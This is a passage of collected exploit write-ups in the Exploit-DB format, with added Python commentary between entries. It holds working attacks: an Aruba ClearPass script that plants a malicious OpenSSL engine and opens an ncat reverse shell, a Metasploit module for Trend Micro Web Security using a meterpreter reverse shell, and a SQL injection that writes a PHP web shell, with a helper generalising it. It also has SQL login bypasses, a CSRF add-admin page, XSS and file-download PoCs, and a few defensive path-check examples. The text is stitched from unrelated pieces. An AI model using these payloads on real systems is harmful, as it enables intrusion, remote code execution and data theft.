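    """Inverse: the field values .NET would emit for this GUID (_a/_b/_c signed)."""
    return list(GUID_STRUCT.unpack(uuid.UUID(str(value)).bytes_le))


# Constructed stand-in for the relevant part of the GetServerInfo reply. The exploit only
# relies on an element named SyncChangeSetID whose eleven children appear in field order;
# the child element names used here are hypothetical.
SAMPLE_SERVER_INFO = """<root><SyncChangeSetID>
<_a>-2008907712</_a><_b>29619</_b><_c>17559</_c>
<_d>155</_d><_e>109</_e><_f>105</_f><_g>175</_g>
<_h>47</_h><_i>28</_i><_j>195</_j><_k>199</_k>
</SyncChangeSetID></root>"""


def changeset_uuid_from_xml(xml_text):
    """Locate SyncChangeSetID and convert it, as get_uuid() in the script does."""
    node = ET.fromstring(xml_text).find(".//SyncChangeSetID")
    if node is None:
        raise ValueError("SyncChangeSetID element not found")
    return dotnet_guid_fields_to_uuid(child.text for child in node)


if __name__ == "__main__":
    print(changeset_uuid_from_xml(SAMPLE_SERVER_INFO))  # 88428040-73b3-4497-9b6d-69af2f1cc3c7
```

Using bytes= instead of bytes_le=, or native byte order in struct, silently yields a different GUID and the UpdateConfig call is then rejected for a ChangeSetID mismatch, which is why the byte order is pinned explicitly.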
            
# Exploit Title: Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution
# Date: 2020-07-06
# Exploit Author: SpicyItalian
# Vendor Homepage: https://www.arubanetworks.com/products/security/network-access-control/
# Version: ClearPass 6.7.x prior to 6.7.13-HF, ClearPass 6.8.x prior to 6.8.5-HF, ClearPass 6.9.x prior to 6.9.1
# Tested on: ClearPass 6.7.0
# CVE: CVE-2020-7115

Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine.

#!/usr/bin/env bash

if [ "$#" -ne 4 ]; then
echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]"
exit 1
fi
# Build the "engine": a shared object whose constructor runs as soon as openssl dlopen()s it
cat <<EOF >payload.c
#include <unistd.h>
__attribute__((constructor))
static void init() {
execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
}
EOF

gcc -fPIC -c payload.c
gcc -shared -o payload.so -lcrypto payload.o
rm -f payload.c payload.o
# The upload lands in /tmp as clientCertFile*.txt (hence the glob) and clientPassphrase is
# spliced unescaped into an openssl command line, so "req -engine <path>" makes openssl
# load our shared object as an engine and run its constructor.
curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null &
cat <<"EOF"

/(\

¡ !´\

| )\ `.

| `.) \,-,--

( / /

`'-.,;_/

`----

EOF

printf "\nPleasea waita for your spicy shell...\n\n"

ncat -v -l $3 $4
            
# Exploit Title: Barangay Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-07-05
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/13484/barangay-management-system.html
# Software Link:  https://www.sourcecodester.com/sites/default/files/download/antiokz/barangay_1.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com

# Vulnerability: the login query concatenates admin_name and admin_pass straight into SQL,
# so an attacker can bypass the login page and reach the dashboard without valid credentials
# vulnerable file : index.php (the login form posts to adminlogin.php, see the request below)
# Parameter & Payload: admin_name and admin_pass, both set to '=''or'
#   Inside the query this turns admin_name='<input>' into admin_name=''=''or'' which MySQL
#   evaluates as ((admin_name='')='') OR '' : the inner comparison yields 0, 0='' is true
#   under MySQL's numeric coercion of the empty string, and the OR makes every row match.
# Proof of Concept:
http://localhost/Barangay/adminlogin.php

POST /Barangay/adminlogin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Referer: http://localhost/Barangay/
Cookie: PHPSESSID=jt0a3e89ukmktgtuoedjqmktge
Connection: keep-alive
Upgrade-Insecure-Requests: 1

admin_name=%27%3D%27%27or%27&admin_pass=%27%3D%27%27or%27&adminlogin=Login

HTTP/1.1 200 OK
Date: Sat, 04 Jul 2020 20:35:25 GMT
Server: Apache/2.4.39 (Win64) PHP/7.2.18
X-Powered-By: PHP/7.2.18
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 3638
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
            
# Exploit Title: HelloWeb 2.0 - Arbitrary File Download
# Date: 2020-07-09
# Vendor Homepage: https://helloweb.co.kr/
# Version: 2.0 [Latest] and previous versions
# Exploit Author: bRpsd
# Contact Author: cy[at]live.no
# Google Dork: inurl:exec/file/download.asp
# Type: WebApps / ASP
-----------------------------------------------------



Vulnerable code:
######################################################################################################
Dim filepath, filename, root_path, fso, root_folder, attachfile, objStream, strFile

filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")   ' only normalises the separator; ".." is left untouched

root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)

' No canonicalisation and no check that the result stays below root_path:
' filepath=/ with filename=web.config (or any ..\ sequence) reaches arbitrary files
attachfile = root_path & filepath & "\" & filename

Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open

objStream.Type = 1
objStream.LoadFromFile attachfile

Response.BinaryWrite objStream.Read
Response.Flush
######################################################################################################

Vulnerability: Arbitrary File Download
Location: http://localhost/exec/file/download.asp
Parameters: filename & filepath

Proof of concept:

GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

RESPONSE:
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
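The containment check the handler is missing, as an added Python example (not HelloWeb's code): vulnerable_attach_path reproduces download.asp's concatenation so the effect of filepath=/&filename=web.config is visible, and safe_attach_path shows the canonicalise-then-check pattern a fix needs. WEB_ROOT, ATTACH_DIR and the file names are assumed values; ntpath is used so the Windows path rules apply wherever this runs.

```python
import ntpath

# Assumed layout (hypothetical): the site lives under WEB_ROOT and attachments are
# only ever served from the ATTACH_DIR subtree.
WEB_ROOT = r"C:\inetpub\wwwroot"
ATTACH_DIR = "upload"


def vulnerable_attach_path(root, filepath, filename):
    """Mirror of download.asp: root & filepath & "\\" & filename after "/" -> "\\".

    Nothing is canonicalised and nothing is checked, so filepath=/ with
    filename=web.config hands back the site's own web.config."""
    filepath = filepath.replace("/", "\\")
    return root + filepath + "\\" + filename


def safe_attach_path(root, filepath, filename, attach_dir=ATTACH_DIR):
    """Resolve the request and refuse anything outside root\\attach_dir.

    Raises ValueError for traversal, absolute or drive-qualified paths, and for
    file names that carry directory components."""
    if not filename or filename in (".", "..") or ntpath.basename(filename) != filename:
        raise ValueError("filename must be a bare file name")
    rel = filepath.replace("/", "\\").lstrip("\\")
    if ntpath.splitdrive(rel)[0]:
        raise ValueError("drive-qualified filepath rejected")
    base = ntpath.normpath(ntpath.join(root, attach_dir))
    candidate = ntpath.normpath(ntpath.join(base, rel, filename))
    # Containment check on the normalised, case-folded path: normpath has collapsed
    # every "..", so a result that does not sit below base escaped the directory.
    # The trailing separator stops "upload_evil" from passing as a prefix of "upload".
    if not ntpath.normcase(candidate).startswith(ntpath.normcase(base) + "\\"):
        raise ValueError("path escapes the attachment directory")
    return candidate


def is_allowed(root, filepath, filename):
    """Boolean form of safe_attach_path for quick checks."""
    try:
        safe_attach_path(root, filepath, filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(vulnerable_attach_path(WEB_ROOT, "/", "web.config"))
    print(safe_attach_path(WEB_ROOT, "/2020/07", "report.pdf"))
    print(is_allowed(WEB_ROOT, "/../", "web.config"))
```

Alternate data streams (file.txt:stream) and trailing dots or spaces are further Windows-specific cases a real allow-list should handle; the check above only addresses directory escape.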
            
# Exploit Title: Park Ticketing Management System 1.0  - 'viewid' SQL Injection
# Date: 2020-07-13
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10952
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)



import requests

# This script is for PoC purposes only; add your own error checking.
# The hex literal in the UNION is <?php system($_REQUEST['gh1mau']); ?>; INTO OUTFILE
# writes it to the web root, which needs the FILE privilege and a path MySQL can write.
command = "whoami"
url = "http://localhost:80/ptms/view-normal-ticket.php?viewid=1%27%20UNION%20ALL%20SELECT%200x3c3f7068702073797374656d28245f524551554553545b276768316d6175275d293b203f3e,NULL,NULL,NULL,NULL,NULL,NULL%20INTO%20OUTFILE%20%27C:/UwAmp/www/ptms/1.php%27--%20-"

headers = {
    "Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Connection": "close",
    "Host": "localhost",
    "Accept-Encoding": "gzip, deflate",
    "Upgrade-Insecure-Requests": "1",
    "Accept-Language": "en-US,en;q=0.5"
}

print("[+] Injecting Web Shell...\n")
response = requests.get(url, headers=headers)

url2 = "http://localhost:80/ptms/1.php?gh1mau=" + command
response2 = requests.get(url2, headers=headers)

print("Web Shell: " + url2)
print(response2.text)
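An added Python example, not from the PoC author or phpGurukul, that takes the page's request apart and rebuilds it: decode_hex_literal shows what the 0x... literal in the UNION is, hex_literal/build_outfile_union produce the same statement for any column count, output path and shell source, and injected_sql checks the result against the PoC URL. The URL and paths are the page's own; nothing is sent anywhere.

```python
from urllib.parse import quote, unquote

# The page's request, for reference (verbatim from the PoC above).
PAGE_URL = ("http://localhost:80/ptms/view-normal-ticket.php?viewid=1%27%20UNION%20ALL%20SELECT"
            "%200x3c3f7068702073797374656d28245f524551554553545b276768316d6175275d293b203f3e"
            ",NULL,NULL,NULL,NULL,NULL,NULL%20INTO%20OUTFILE%20%27C:/UwAmp/www/ptms/1.php%27--%20-")


def decode_hex_literal(literal):
    """Turn a MySQL 0x... string literal back into the text it stands for."""
    body = literal[2:] if literal[:2].lower() == "0x" else None
    if not body or len(body) % 2:
        raise ValueError("not a MySQL hex literal")
    return bytes.fromhex(body).decode("utf-8")


def hex_literal(text):
    """Encode text as 0x...: MySQL reads it as a string, but the statement carries
    no quote characters, so addslashes()/magic_quotes style filtering never fires."""
    return "0x" + text.encode("utf-8").hex()


def build_outfile_union(column_count, outfile, payload_text, closing_value="1"):
    """UNION ALL SELECT ... INTO OUTFILE payload for a parameter wrapped in single quotes.

    column_count must equal the number of columns of the original SELECT (7 for the
    page's request); the payload goes in the first column, the rest are padded with NULL."""
    if column_count < 1:
        raise ValueError("need at least one column")
    cols = [hex_literal(payload_text)] + ["NULL"] * (column_count - 1)
    return "%s' UNION ALL SELECT %s INTO OUTFILE '%s'-- -" % (
        closing_value, ",".join(cols), outfile)


def build_injection_url(base_url, param, column_count, outfile, payload_text):
    """Full GET URL, percent-encoding everything the injected statement needs."""
    sql = build_outfile_union(column_count, outfile, payload_text)
    return "%s?%s=%s" % (base_url, param, quote(sql, safe=""))


def injected_sql(url, param="viewid"):
    """Recover the SQL fragment a request like the PoC's actually sends."""
    return unquote(url.split(param + "=", 1)[1])


if __name__ == "__main__":
    print(decode_hex_literal(PAGE_URL.split("0x", 1)[1].split(",", 1)[0].join(("0x", ""))))
    print(injected_sql(PAGE_URL))
```

INTO OUTFILE only works when the database account holds FILE, secure_file_priv does not restrict the target directory, and the MySQL service account can write to the web root, which is why the PoC targets the UwAmp bundle's own path.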
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
  
    include Msf::Exploit::Remote::HttpClient
  
    def initialize(info = {})
      super(
        update_info(
          info,
          'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
          'Description' => %q{
            This module chains multiple vulnerabilities in order to achieve remote code execution.
            Unauthenticated users can execute a terminal command in the context of the root user.

            The specific flaw exists within the LogSettingHandler class of the administrator interface software.
            When parsing the mount_device parameter, the process does not properly validate a user-supplied string
            before using it to execute a system call. An attacker can leverage this vulnerability to execute code in
            the context of root, but authentication is required to exploit it.

            Another flaw exists within the proxy service, which listens on port 8080 by default. Unauthenticated users
            can exploit this vulnerability in order to communicate with internal services in the product.

            Last but not least, a flaw exists within the Apache Solr application, which is installed within the product.
            When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.
            An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.

            Combining these vulnerabilities, unauthenticated users can execute a terminal command in the context of the root user.

            Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected.
          },
          'License' => MSF_LICENSE,
          'Author' =>
            [
              'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
            ],
          'References' =>
            [
              ['CVE', '2020-8604'],
              ['CVE', '2020-8605'],
              ['CVE', '2020-8606'],
              ['ZDI', '20-676'],
              ['ZDI', '20-677'],
              ['ZDI', '20-678']
            ],
          'Privileged' => true,
          'DefaultOptions' =>
            {
              'SSL' => true,
              'payload' => 'python/meterpreter/reverse_tcp',
              'WfsDelay' => 30
            },
          'Payload' =>
            {
              'Compat' =>
              {
                'ConnectionType' => '-bind'
              }
            },
          'Platform' => ['python'],
          'Arch' => ARCH_PYTHON,
          'Targets' => [ ['Automatic', {}] ],
          'DisclosureDate' => '2020-06-10',
          'DefaultTarget' => 0,
          'Notes' =>
            {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
        )
      )
  
      register_options(
        [
          Opt::RPORT(8443),
          OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])
        ]
      )
    end
  
    def hijack_cookie
      # Updating SSL and RPORT in order to communicate with HTTP proxy service.
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end
      port_restore = datastore['RPORT']
      datastore['RPORT'] = datastore['PROXY_PORT']
  
      @jsessionid = ''
  
      # We are exploiting proxy service vulnerability in order to fetch content of catalina.out file
      print_status('Trying to extract session ID by exploiting reverse proxy service')
  
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
        'vars_get' => {
          'command' => 'filecontent',
          'wt' => 'filestream',
          'generation' => 1,
          'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'
        }
      })
  
      # Restore variables and validate extracted sessionid
      datastore['SSL'] = true if ssl_restore
      datastore['RPORT'] = port_restore
  
      # Routine check on res object
      unless res
        fail_with(Failure::Unreachable, 'Target is unreachable.')
      end
  
      # If the res code is not 200 that means proxy service is not vulnerable.
      unless res.code == 200
        @jsessionid = -1
        return
      end
  
      # Now we are going to extract all JSESSIONID values from the log file and store them in an array.
      cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten
  
      if cookies.empty?
        @jsessionid = 0
        print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')
        return
      end
  
      print_good("Extracted number of JSESSIONID: #{cookies.length}")
  
      # We gotta switch back to the administrator interface port instead of the proxy service. Restore rport and ssl variables.
      datastore['SSL'] = true if ssl_restore
      datastore['RPORT'] = port_restore
  
      # Latest cookie in the log file is the one most probably active. So that we use reverse on array.
      cookies.reverse.each_with_index do |cookie, index|
        print_status("Testing JSESSIONID ##{index} : #{cookie}")
  
        # This endpoints is basically check session :)
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
          'cookie' => "JSESSIONID=#{cookie}"
        })
  
        # Routine res check
        unless res
          fail_with(Failure::UnexpectedReply, 'Target is unreachable.')
        end
  
        # If the cookie is active !
        if res.code == 200 && res.body.include?('session_flag')
          print_good("Awesome!!! JESSIONID ##{index} is active.")
          @jsessionid = cookie
          break
        end
  
        print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")
      end
  
      if @jsessionid.empty?
        print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')
      end
    end
  
    def check
      #
      # @jsessionid can be one of the following values
      #
      # -1 = Proxy service is not vulnerable, which means we're not going to
      # be able to read catalina.out
      #
      # 0  = Proxy service is vulnerable, but catalina.out does not contain any
      # JSESSIONID string yet!
      #
      # empty = Proxy service is vulnerable and JSESSIONIDs were found in the log file, but
      # none of them are valid :(
      #
      # string = Proxy service is vulnerable and the session ID is valid!
      #
      hijack_cookie
  
      if @jsessionid == -1
        CheckCode::Safe
      else
        CheckCode::Vulnerable
      end
    end
  
    def exploit
  
      unless check == CheckCode::Vulnerable
        fail_with Failure::NotVulnerable, 'Target is not vulnerable'
      end
  
      #
      # 0     => Proxy service is vulnerable, but catalina.out does not contain any
      # JSESSIONID string yet!
      #
      # empty => Proxy service is vulnerable and JSESSIONIDs were found in the log file, but
      # none of them are valid :(
      #
      # 0 is an Integer and has no empty? method, so test it first.
      if @jsessionid == 0 || @jsessionid.empty?
        fail_with Failure::NoAccess, 'No usable JSESSIONID was obtained'
      end
  
      print_status('Exploiting command injection vulnerability')
  
      # Yet another app specific bypass is going on here.
      # It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)
      # For that reason, I am planting our payload dropper within the perl command.
  
      cmd = "python -c \"#{payload.encoded}\""
      final_payload = cmd.to_s.unpack1('H*')
      p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
  
      vars_post = {
        mount_device: "mount $(#{p}) /var/offload",
        cmd: 'mount'
      }
  
      send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
        'cookie' => "JSESSIONID=#{@jsessionid}",
        'ctype' => 'application/json',
        'data' => vars_post.to_json
      })
    end
  end
            
# Exploit title: BSA Radar 1.6.7234.24750 - Local File Inclusion
# Date: 2020-07-08
# Exploit Author: William Summerhill
# Vendor homepage: https://www.globalradar.com/
# Version: BSA Radar - Version 1.6.7234.24750 and lower
# CVE-2020-14946 - Local File Inclusion

# Description: The Administrator section of the Surveillance module in Global RADAR - BSA Radar 1.6.7234.X 
# and lower allows users to download transaction files. When downloading the files, 
# a user is able to view local files on the web server by manipulating the FileName 
# and FilePath parameters in the URL, or while using a proxy. This vulnerability could 
# be used to view local sensitive files or configuration files on the backend server.

	Vulnerable endpoint: /UC/downloadFile.ashx

	The current user is required to have valid privileges to send requests to the target vulnerable endpoint.

Proof of Concept:

	HTTP Request PoC:

		VALID REQUEST:
		GET /UC/downloadFile.ashx?ID=XXXX&FileName=SOMEFILE.TXT&UploadStyle=1&UploadStyle=1&UploadSource=6

		LFI EXPLOIT REQUEST:
		GET /UC/downloadFile.ashx?ID=XXXX&FileName=C:\Windows\debug\NetSetup.log&UploadStyle=1&UploadSource=6

	The entire LFI path can be injected into the "FileName" parameter in order to enumerate existing files on the server. Other LFI files can be tested (such as the Windows hosts file) for further verification and disclosures.

Tested on: Windows

CVE: CVE-2020-14946

Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14946
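A server-side fix and a log check for the FileName handling described above, as an added example that is not BSA Radar's code: the download handler should map FileName onto one fixed directory and refuse any value carrying a drive letter, root, UNC prefix or traversal component, and the same resolver can be run over request logs to surface attempts. The directory C:\inetpub\bsaradar\transactions is an assumption, and the sample request lines are constructed from the two requests in the advisory.

```python
import re
from pathlib import PureWindowsPath
from urllib.parse import parse_qs, urlsplit

# Constructed: the directory in which transaction files are assumed to be stored.
# The real BSA Radar layout is not documented in the advisory.
TRANSACTION_DIR = PureWindowsPath(r"C:\inetpub\bsaradar\transactions")

# One path component: a plain name with no drive letter, separator, ':' stream
# syntax or control characters, and not starting with '.' (so never '.' or '..').
SAFE_COMPONENT = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ._-]*$")


def resolve_download(file_name, base_dir=TRANSACTION_DIR):
    """Map the FileName parameter to a file under base_dir, or return None.

    PureWindowsPath is used because the target runs on Windows; it accepts both
    '\\' and '/' as separators, so '..\\x' and '../x' are treated the same."""
    candidate = PureWindowsPath(file_name)
    # C:\..., \..., C:file and \\server\share\... all carry a drive or root: reject.
    if candidate.drive or candidate.root:
        return None
    # Every component must be a plain name (an empty FileName has no parts at all).
    if not candidate.parts or not all(SAFE_COMPONENT.match(p) for p in candidate.parts):
        return None
    full = base_dir.joinpath(candidate)
    # Defence in depth: the joined path must still be strictly below base_dir.
    if base_dir not in full.parents:
        return None
    return full


REQUEST_LINE = re.compile(r"^(?:GET|POST)\s+(\S+)")


def audit_request_lines(lines):
    """Return the FileName values in downloadFile.ashx request lines that the
    resolver rejects; useful for sweeping a web server log for traversal attempts."""
    rejected = []
    for line in lines:
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/uc/downloadfile.ashx"):
            continue
        for name in parse_qs(url.query).get("FileName", []):
            if resolve_download(name) is None:
                rejected.append(name)
    return rejected


# Constructed sample: the two request lines from the advisory.
SAMPLE_LINES = [
    "GET /UC/downloadFile.ashx?ID=XXXX&FileName=SOMEFILE.TXT&UploadStyle=1&UploadStyle=1&UploadSource=6",
    r"GET /UC/downloadFile.ashx?ID=XXXX&FileName=C:\Windows\debug\NetSetup.log&UploadStyle=1&UploadSource=6",
]

if __name__ == "__main__":
    print(resolve_download("SOMEFILE.TXT"))   # C:\inetpub\bsaradar\transactions\SOMEFILE.TXT
    print(audit_request_lines(SAMPLE_LINES))  # ['C:\\Windows\\debug\\NetSetup.log']
```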
            
# Exploit Title: Park Ticketing Management System 1.0  - Authentication Bypass
# Date: 2020-07-13
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10952
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)

Vulnerable File:
---------------- 
/index.php

Vulnerable Code:
-----------------
line 8: $adminuser=$_POST['username'];

Vulnerable Issue:
-----------------
$adminuser=$_POST['username']; has no sanitization

POC User Login:
---------------

URL: http://localhost/ptms/index.php
Username : ' or '1'='1'#
Password : anything


Python POC:
-----------

import requests,re

url = "http://localhost:80/ptms/index.php"

payload = "username=%27+or+%271%27%3D%271%27%23&password=anything&login="
headers = {
    "Origin": "http://localhost", 
    "Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6", 
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", 
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0", 
    "Connection": "close", 
    "Referer": "http://localhost/ptms/index.php", 
    "Host": "localhost", 
    "Accept-Encoding": "gzip, deflate", 
    "Upgrade-Insecure-Requests": "1", 
    "Accept-Language": "en-US,en;q=0.5", 
    "Content-Length": "80", 
    "Content-Type": "application/x-www-form-urlencoded"
}

pattern = "PTMS ADMIN"
response = requests.request("POST", url, data=payload, headers=headers)

if re.findall(pattern,response.text):
    print("[+] Authentication bypassed using the following payload : " + payload)

else:
    print("[!] Something wrong somewhere")
            
# Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Date: 2020-07-15
# Vendor Homepage: https://www.supermicro.com/
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# CVE: CVE-2020-15046
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery

# Description:
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
# The fixed versions are BIOS 3.2 and firmware 03.88.

# PoC :

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
<input type="hidden" name="username" value="JOKER" />
<input type="hidden" name="original&#95;username" value="2" />
<input type="hidden" name="password" value="onebadday" />
<input type="hidden" name="new&#95;privilege" value="4" />
<input type="submit" value="submit request" />
</form>
</body>
</html>
            
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
# Date: 2020-06-19
# Exploit Author: Rajivarnan R
# Vendor Homepage: https://www.zyxel.com/
# Software [http://www.zyxelguard.com/WAP6806.asp]
# Version: [V1.00(ABAL.6)C0]
# CVE: 2020-14461
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]

# As a result of the research, one vulnerability was identified
# (Directory Traversal).
# Technical information is provided below step by step.

# [1] - Directory Traversal Vulnerability

# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/

# Proof of Concept: https://TARGET/Zyxel/images/eaZy/
            
# Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
# Date: 2020-07-03
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system
# Software Link: https://github.com/mrzulkarnine/Web-based-hotel-booking-system
# Version: 0.1.0
# Tested on: Kali Linux

Source code(localhost/admin/loginauth.php):
<?php
session_start();

$_SESSION['username'] = $_POST['username'];
$_SESSION['password'] = $_POST['password'];

include './auth.php';
$re = mysql_query("select * from user where username = '".$_SESSION['username']."'  AND password = '".$_SESSION['password']."' " );
echo mysql_error();
if(mysql_num_rows($re) > 0)
{
    header('Refresh: 0;url=dashboard.php');
}
else
{
    session_destroy();
    header("location: index.htm");
}
?>

Payload:
       Username: 1' or 1 = 1 LIMIT 1#
       Password: 1' or 1 = 1 LIMIT 1#
            
# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
# Date: 2020-06-29
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage:  https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html
# Software Link:  https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/
# Version: 0.1.0
# Tested on: Kali Linux

Source code(review.php):
<?php
if($result) :
while($row1 = $result->fetch_array()) :
?>
  <div class="con">
  <div class="row">
  <div class="col-sm-4">
  <em style="color: black;"><?= $row1['comment']; ?></em>
</div>


POC:

1. Go to http://192.168.1.58/a/review.php?pid=31
2. Use the payload (<script>alert(1)</script>)
3. Write it as a review and submit
4. Refresh the page
            
# Exploit Title: Online Polling System 1.0 - Authentication Bypass
# Date: 2020-07-20
# Author: AppleBois
# Version: NULL
# Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html
#
# Administration Control Panel || Authentication Bypass
# An unauthenticated user can perform SQL injection to bypass the login mechanism on /admin/checklogin.php
#
######################################################################################
#Vulnerable Code
#
#$myusername=$_POST['myusername'];
#$mypassword=$_POST['mypassword'];
#$encrypted_mypassword=md5($mypassword);
#
#$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'");
#
#$count=mysqli_num_rows($result);
#
#if($count==1){
#
#$user = mysqli_fetch_assoc($result);
#$_SESSION['member_id'] = $user['member_id'];
#header("location:student.php");
#}
#
######################################################################################


POST /admin/checklogin.php HTTP/1.1
Host: 10.10.10.2:81
Content-Length: 53
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.2:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.2:81/online/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
